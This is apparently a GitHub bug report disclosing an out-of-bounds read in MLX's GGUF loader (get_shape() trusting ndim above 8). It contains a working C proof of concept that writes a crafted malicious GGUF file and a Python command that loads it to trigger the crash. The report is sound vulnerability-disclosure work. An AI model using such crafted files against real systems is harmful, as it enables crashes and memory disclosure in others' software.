Skip to content

[BUG] get_shape() has no bounds check allowing read of outside data structure #3358

@MillaFleurs

Description

@MillaFleurs

Describe the bug

  1. get_shape() has no bounds check (mlx/io/gguf.cpp:50-57)
    for (int i = tensor.ndim - 1; i >= 0; i--) {
    shape.push_back(tensor.dim[i]); // no check that ndim <= 8
    }

  2. dim[] is fixed at 8 elements (vendored gguflib.h)
    #define GGUF_TENSOR_MAX_DIM 8
    uint64_t dim[GGUF_TENSOR_MAX_DIM];

  3. The only guard is an assert() (vendored gguflib.c:279)
    tensor->ndim = *num_dim;
    assert(tensor->ndim <= GGUF_TENSOR_MAX_DIM); // compiled out with NDEBUG

  4. No NDEBUG override in the build (mlx/io/CMakeLists.txt:9-26) — gguflib is built as a plain static library with no flags to
    preserve asserts in release mode.

  5. Two call sites reach get_shape() with untrusted tensor data:

  • mlx/io/gguf.cpp:234 — non-quantized tensor loading
  • mlx/io/gguf_quants.cpp:112 — quantized tensor loading
  1. If you access dim[n] where n >= 8 you read the following data:
 typedef struct {
      const char *name;                   //  8 bytes
      size_t namelen;                     //  8 bytes
      uint32_t type;                      //  4 bytes
      uint32_t ndim;                      //  4 bytes
      uint64_t dim[8];                    // 64 bytes  <-- dim[0] through dim[7]
      // --- everything below is what dim[8+] reads ---
      uint64_t offset;                    //  8 bytes  → dim[8]
      uint64_t bsize;                     //  8 bytes  → dim[9]
      uint64_t num_weights;               //  8 bytes  → dim[10]
      uint8_t *weights_data;              //  8 bytes  → dim[11]
      // --- past the struct boundary ---
      // dim[12..31] → stack frame: local variables, saved registers,
      //               return address, caller's frame, etc.
  } gguf_tensor;

To Reproduce

/*
 * POC: GGUF Tensor ndim Stack Out-of-Bounds Read (ADVISORY-2026-001 / V1-002)
 *
 * Demonstrates two vulnerabilities triggered by a crafted GGUF with ndim > 8:
 *
 *   Part A: Shows that assert() is a no-op in release builds (NDEBUG),
 *           leaving ndim completely unchecked in gguflib.c.
 *
 *   Part B: Directly demonstrates the OOB read in MLX's get_shape().
 *           A gguf_tensor is placed on the stack with ndim=32 but only
 *           dim[0..7] initialized. The get_shape() loop reads dim[8..31],
 *           which are whatever happens to be adjacent in memory.
 *
 *   Part C: Generates a minimal malicious GGUF file (crash_v1002.gguf)
 *           that can be loaded with actual MLX to trigger the real bug:
 *             python3 -c "import mlx.core as mx; mx.load_gguf('crash_v1002.gguf')"
 *
 * Build & run:
 *   cc -DNDEBUG -O2 -o poc_ndim_oob poc_ndim_oob.c && ./poc_ndim_oob
 *
 * Optional — build with AddressSanitizer for formal OOB detection:
 *   cc -DNDEBUG -O0 -fsanitize=address -o poc_ndim_oob_asan poc_ndim_oob.c
 *   ./poc_ndim_oob_asan
 */

#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ===== Replica of gguflib structures (from gguflib.h) ===== */

#define GGUF_TENSOR_MAX_DIM 8

typedef struct {
    const char *name;
    size_t namelen;
    uint32_t type;
    uint32_t ndim;
    uint64_t dim[GGUF_TENSOR_MAX_DIM]; /* Fixed 8-element array */
    uint64_t offset;
    uint64_t bsize;
    uint64_t num_weights;
    uint8_t *weights_data;
} gguf_tensor;

/* ===== Part A: Demonstrate assert() is a no-op ===== */

static void demo_assert_noop(void) {
    printf("--- Part A: assert() behavior under NDEBUG ---\n\n");

    uint32_t ndim = 32;

    /*
     * This is the exact check from gguflib.c ~line 279:
     *     assert(tensor->ndim <= GGUF_TENSOR_MAX_DIM);
     */
    assert(ndim <= GGUF_TENSOR_MAX_DIM);

#ifdef NDEBUG
    printf("[!] NDEBUG is defined -- assert() compiled to nothing.\n");
    printf("    ndim=%u passed through with ZERO validation.\n", ndim);
    printf("    This is the root cause: gguflib trusts assert() for\n");
    printf("    untrusted input validation.\n\n");
#else
    /* If we reach here without NDEBUG, assert would have aborted above. */
    printf("[*] NDEBUG is NOT defined -- assert() is active.\n");
    printf("    Rebuild with -DNDEBUG to simulate release behavior.\n\n");
#endif
}

/* ===== Part B: Demonstrate OOB read in get_shape() ===== */

/*
 * We place a canary struct right after the tensor on the stack to make
 * the OOB read visible. In real MLX, whatever is adjacent on the stack
 * (return addresses, saved registers, local variables) gets read instead.
 */
typedef struct {
    gguf_tensor tensor;
    /* These 24 uint64_t values sit right after tensor.dim[7] in memory,
     * occupying the space that dim[8..31] would index into.
     * (Some are the struct's own trailing fields; the rest overflow.) */
    uint64_t canary[24];
} stacked_layout;

static void demo_get_shape_oob(void) {
    printf("--- Part B: OOB read in get_shape() ---\n\n");

    stacked_layout layout;
    memset(&layout, 0, sizeof(layout));

    /* Initialize the tensor as if gguflib parsed it (but without the
     * OOB write -- we're isolating the get_shape() read side). */
    layout.tensor.ndim = 32;  /* Attacker-controlled from GGUF file */

    /* Fill the valid dim[0..7] with recognizable values */
    for (int i = 0; i < GGUF_TENSOR_MAX_DIM; i++) {
        layout.tensor.dim[i] = 100 + i;  /* 100, 101, ..., 107 */
    }

    /* Fill canary region with a distinct pattern so we can see the OOB */
    for (int i = 0; i < 24; i++) {
        layout.canary[i] = 0xDEADBEEF00000000ULL | (uint64_t)i;
    }

    /*
     * This is the vulnerable loop from mlx/io/gguf.cpp lines 50-57:
     *
     *   Shape get_shape(const gguf_tensor& tensor) {
     *     Shape shape;
     *     for (int i = tensor.ndim - 1; i >= 0; i--) {
     *       shape.push_back(tensor.dim[i]);
     *     }
     *     return shape;
     *   }
     *
     * We replicate it here, iterating forward for readability:
     */
    printf("[*] get_shape() iterates ndim=%u times over dim[%d] array:\n\n",
           layout.tensor.ndim, GGUF_TENSOR_MAX_DIM);
    printf("    %-8s %-20s %s\n", "Index", "Value", "Status");
    printf("    %-8s %-20s %s\n", "-----", "-----", "------");

    for (int i = (int)layout.tensor.ndim - 1; i >= 0; i--) {
        uint64_t val = layout.tensor.dim[i]; /* OOB read when i >= 8 */

        if (i < GGUF_TENSOR_MAX_DIM) {
            printf("    dim[%2d]  %-20llu  OK (valid element)\n",
                   i, (unsigned long long)val);
        } else {
            printf("    dim[%2d]  0x%016llx   ** OOB READ — adjacent memory! **\n",
                   i, (unsigned long long)val);
        }
    }

    printf("\n[!] The %d lines marked OOB read memory beyond the dim[] array.\n",
           32 - GGUF_TENSOR_MAX_DIM);
    printf("    In real MLX, these would be stack variables, return addresses,\n");
    printf("    or other struct members — an information disclosure or crash.\n\n");
}

/* ===== Part C: Generate a malicious GGUF file ===== */

static void write_le32(uint8_t *buf, uint32_t val) {
    buf[0] = (uint8_t)(val);
    buf[1] = (uint8_t)(val >> 8);
    buf[2] = (uint8_t)(val >> 16);
    buf[3] = (uint8_t)(val >> 24);
}

static void write_le64(uint8_t *buf, uint64_t val) {
    for (int i = 0; i < 8; i++)
        buf[i] = (uint8_t)(val >> (i * 8));
}

#define MALICIOUS_NDIM 32
#define TENSOR_NAME "weight"
#define ALIGNMENT 32

static void generate_gguf(const char *path) {
    printf("--- Part C: Generate malicious GGUF file ---\n\n");

    size_t name_len = strlen(TENSOR_NAME);
    size_t header_size = 4 + 4 + 8 + 8;
    size_t tensor_info_size = 8 + name_len + 4 + (8 * MALICIOUS_NDIM) + 4 + 8;
    size_t info_end = header_size + tensor_info_size;
    size_t data_start = (info_end + ALIGNMENT - 1) & ~(size_t)(ALIGNMENT - 1);
    size_t total_size = data_start + 4; /* 1 F32 element */

    uint8_t *buf = (uint8_t *)calloc(1, total_size);
    if (!buf) { perror("calloc"); exit(1); }

    size_t off = 0;

    /* GGUF header (v3) */
    memcpy(buf + off, "GGUF", 4);               off += 4;
    write_le32(buf + off, 3);                    off += 4;
    write_le64(buf + off, 1);                    off += 8;  /* 1 tensor */
    write_le64(buf + off, 0);                    off += 8;  /* 0 metadata KV */

    /* Tensor info: name */
    write_le64(buf + off, name_len);             off += 8;
    memcpy(buf + off, TENSOR_NAME, name_len);    off += name_len;

    /* Tensor info: ndim = 32 (MALICIOUS — exceeds GGUF_TENSOR_MAX_DIM) */
    write_le32(buf + off, MALICIOUS_NDIM);       off += 4;

    /* 32 dimension values (only first 8 fit in the struct) */
    for (uint32_t i = 0; i < MALICIOUS_NDIM; i++) {
        write_le64(buf + off, (i < 8) ? 1 : 0xDEAD0000 + i);
        off += 8;
    }

    /* Tensor type = F32 (0) */
    write_le32(buf + off, 0);                    off += 4;

    /* Tensor data offset = 0 */
    write_le64(buf + off, 0);                    off += 8;

    /* Tensor data: single float 1.0f */
    float one = 1.0f;
    memcpy(buf + data_start, &one, 4);

    FILE *fp = fopen(path, "wb");
    if (!fp) { perror("fopen"); exit(1); }
    fwrite(buf, 1, total_size, fp);
    fclose(fp);
    free(buf);

    printf("[+] Written: %s (%zu bytes)\n", path, total_size);
    printf("    Tensor 'weight' has ndim=%d (max valid=%d)\n",
           MALICIOUS_NDIM, GGUF_TENSOR_MAX_DIM);
    printf("\n    To trigger in real MLX:\n");
    printf("      python3 -c \"import mlx.core as mx; mx.load('%s')\"\n\n", path);
}

/* ===== Main ===== */

int main(void) {
    printf("=========================================================\n");
    printf("  ADVISORY-2026-001 POC: GGUF Tensor ndim OOB Read\n");
    printf("  Affects: MLX <= commit befe42d3\n");
    printf("=========================================================\n\n");

    demo_assert_noop();
    demo_get_shape_oob();
    generate_gguf("crash_v1002.gguf");

    return 0;
}

Compile:

 cc -DNDEBUG -O2 -o poc_ndim_oob poc_ndim_oob.c && ./poc_ndim_oob

Optional: build with AddressSanitizer for formal OOB detection:

 cc -DNDEBUG -O0 -fsanitize=address -o poc_ndim_oob_asan poc_ndim_oob.c

run: ./poc_ndim_oob_asan

Reproducable in Python as well:
python3 -c "import mlx.core as mx; mx.load('crash_v1002.gguf')"

Expected behavior

Check out https://github.com/ggml-org/ggml/blob/master/docs/gguf.md

If you scroll down you will see, as of today, dimensions should be <= 4. 8 is excessive (unless it changes in gguf)

struct gguf_tensor_info_t {
    // The name of the tensor. It is a standard GGUF string, with the caveat that
    // it must be at most 64 bytes long.
    gguf_string_t name;
    // The number of dimensions in the tensor.
    // Currently at most 4, but this may change in the future.
    uint32_t n_dimensions;
    // The dimensions of the tensor.
    uint64_t dimensions[n_dimensions];
    // The type of the tensor.
    ggml_type type;
    // The offset of the tensor's data in this file in bytes.
    //
    // This offset is relative to `tensor_data`, not to the start
    // of the file, to make it easier for writers to write the file.
    // Readers should consider exposing this offset relative to the
    // file to make it easier to read the data.
    //
    // Must be a multiple of `ALIGNMENT`. That is, `align_offset(offset) == offset`.
    uint64_t offset;
};

Desktop (please complete the following information):

  • OS Version: MacOS 26.3.1 (a) M2 16GB

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions